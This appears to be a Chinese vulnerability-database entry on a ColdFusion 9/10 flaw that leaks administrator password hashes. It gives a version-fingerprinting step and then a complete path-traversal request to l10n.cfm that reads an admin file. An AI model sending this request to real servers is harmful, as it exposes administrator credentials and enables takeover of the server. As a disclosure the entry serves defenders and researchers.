ColdFusion 9-10 - Credential...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

<p>ColdFusion 版本9/10远程密码HASH获取漏洞<br></p><p>首先测试目标网站地址是否可达:</p><p><a href="http://target_web_site/" rel="nofollow">http://target_web_site/</a>CFIDE/administrator/images/loginbackground.jpg</p><p>通过上述图片的hash值可判断版本</p</p><p>然后测试:</p><p><a href="http://target_web_site/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&amp;attributes.file=../../administrator/analyzer/index.cfm&amp;attributes.locale=it&amp;attributes.var=it&amp;attributes.jscript=false&amp;attributes.type=text/html&amp;attributes.charset=UTF-8&amp;thisTag.executionmode=end&amp;thisTag.generatedContent=htp" rel="nofollow">http://target_web_site/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&amp;attributes.file=../../administrator/analyzer/index.cfm&amp;attributes.locale=it&amp;attributes.var=it&amp;attributes.jscript=false&amp;attributes.type=text/html&amp;attributes.charset=UTF-8&amp;thisTag.executionmode=end&amp;thisTag.generatedContent=htp</a><br></p><p>如果成功的话就可以,接下来可以直接参考python脚本了.</p>

0%
暂无可用Exp或PoC
当前有0条受影响产品信息